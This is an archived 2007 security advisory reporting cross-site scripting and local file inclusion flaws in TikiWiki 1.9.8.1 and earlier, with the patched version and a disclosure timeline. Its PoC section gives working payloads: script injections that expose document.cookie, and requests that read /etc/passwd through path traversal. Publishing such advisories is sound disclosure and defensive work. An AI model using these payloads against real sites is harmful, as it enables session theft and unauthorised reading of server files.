tikiwiki-xsslfi.txt

2007-10-25T00:00:00
ID PACKETSTORM:60433
Type packetstorm
Reporter L4teral
Modified 2007-10-25T00:00:00

Description

                                        
                                            `======================================================================  
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion  
======================================================================  
  
Author: L4teral <l4teral [4t] gmail com>  
Impact: Cross Site Scripting  
Local File Inclusion  
Status: patch available  
  
  
------------------------------  
Affected software description:  
------------------------------  
  
Application: TikiWiki  
Version: <= 1.9.8.1  
Vendor: http://tikiwiki.org  
  
Description:  
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.  
  
  
--------------  
Vulnerability:  
--------------  
  
XSS:  
1. The password reminder page is vulnerable to cross site scripting.  
  
2. Script code can be embedded into wiki-pages.  
  
3. The script db/tiki-db.php is vulnerable to cross site scripting  
  
LFI:  
4.  
The script db/tiki-db.php is vulnerable to local file inclusion attacks.  
  
5.  
The script tiki-imexport_languages.php is vulnerable to local file  
inclusion attacks.  
  
  
------------  
PoC/Exploit:  
------------  
  
XSS:  
1.  
enter in the form: <img src="javascript:alert(document.cookie)">  
  
URL: http://localhost/tikiwiki/tiki-remind_password.php  
POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E  
remind=send+me+my+password  
  
2.  
create wiki page with:  
{img src=javascript:alert(document.cookie) }  
  
3.  
http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>  
  
LFI:  
4.  
register_globals required:  
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd  
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd  
  
5.  
feature lang_use_db(use database for translation) must be activated:  
URL: http://localhost/tikiwiki/tiki-imexport_languages.php  
POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import  
  
  
---------  
Solution:  
---------  
  
update to 1.9.8.2 or above:  
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549  
  
---------  
Timeline:  
---------  
  
23.10.2007 - vendor informed  
25.10.2007 - vendor released patch  
25.10.2007 - public disclosure  
`